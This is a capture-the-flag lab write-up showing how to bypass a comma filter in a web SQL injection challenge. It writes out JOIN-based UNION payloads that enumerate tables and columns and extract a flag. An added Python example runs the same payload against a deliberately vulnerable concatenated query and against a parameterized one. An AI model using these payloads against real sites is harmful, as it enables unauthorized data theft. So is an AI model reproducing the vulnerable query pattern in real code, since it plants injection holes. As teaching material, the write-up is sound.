Lab environment
i春秋, web SQLI
Normal SQL statements (JOIN builds a multi-column row without using a comma):
select * from test where id=1 and 1=2 union select * from ((select 1)a join (select 2)b join (select 3)c)
select * from test where id=1 and 1=2 union select * from ((select 1)a join (select 2)b join (select group_concat(table_name) from information_schema.tables where table_schema=database())c)
Injection process
The page after loading looks as follows, with id=1
Enter a single quote
Enter ' and 1=1%23
Enter ' and 1=2%23
This confirms that an injection point exists here
The column count is 2
When checking which columns are displayed, everything after the comma is gone
Commas are filtered, so a JOIN statement can be used to inject
' union select * from (select 1) a join (select 2) b %23
Both 1 and 2 are displayed columns
' union select * from (select table_name from information_schema.tables where table_schema='sqli') a join (select database()) b %23
Query the database name and the tables
' union select * from (select 1) a join (select group_concat(column_name) from information_schema.columns where table_name='users') b %23
Query the column names
Query the flag
' union select * from (select 1) a join (select flag_9c861b688330 from users) b %23
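Why stripping commas is not a fix: the added example below (not part of the original writeup) places a comma-filtering lookup beside a parameterized one and runs the page's JOIN payload against both on a constructed SQLite table; the table, column names and flag value are assumptions, and the trailing `#` is swapped for `--` because SQLite has no `#` comment syntax.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the challenge's target table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE test (id INTEGER, name TEXT, secret TEXT)")
    conn.execute("INSERT INTO test VALUES (1, 'alice', 'flag{constructed}')")
    return conn


def lookup_with_comma_filter(conn, user_id):
    """Vulnerable: mirrors the challenge's defence (drop commas) but still
    concatenates the input into the statement, so its structure is attacker-controlled."""
    filtered = user_id.replace(",", "")
    sql = f"SELECT name, secret FROM test WHERE id='{filtered}'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_id):
    """Hardened: the value is bound as a parameter and can only ever be compared
    against id; it cannot add a UNION, a JOIN, or anything else to the statement."""
    sql = "SELECT name, secret FROM test WHERE id=?"
    return conn.execute(sql, (user_id,)).fetchall()


# The page's comma-free JOIN payload, adapted to SQLite comment syntax (assumption):
# each derived table contributes one column, so no comma is needed to build two columns.
PAYLOAD = "' union select * from (select 1) a join (select secret from test) b -- "

if __name__ == "__main__":
    print("filter only  :", lookup_with_comma_filter(make_db(), PAYLOAD))
    print("parameterized:", lookup_parameterized(make_db(), PAYLOAD))
    print("benign id=1  :", lookup_parameterized(make_db(), "1"))
```

The comma filter still leaks the secret through the JOINed subquery, while the parameterized lookup returns no rows for the same input and still serves the benign id.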